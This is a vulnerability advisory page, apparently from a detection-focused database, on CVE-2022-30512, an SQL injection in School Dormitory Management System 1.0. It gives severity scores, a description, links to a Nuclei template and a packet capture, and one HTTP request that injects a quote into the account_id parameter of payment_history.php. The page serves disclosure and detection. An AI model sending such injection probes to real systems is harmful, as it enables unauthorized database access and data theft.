🔙 목록으로 돌아가기

CVE-2022-30512: School Dormitory Management System 1.0 - SQL Injection

TitleSchool Dormitory Management System 1.0 - SQL Injection
Authortess
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationApply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0.
CVSS Score9.8
EPSS Score0.71786
CVE IDCVE-2022-30512
CWE IDCWE-89
Tags cve cve2022 sqli school_dormitory_management_system_project vuln

🔍 Vulnerability Description

School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-30512.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-30512.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A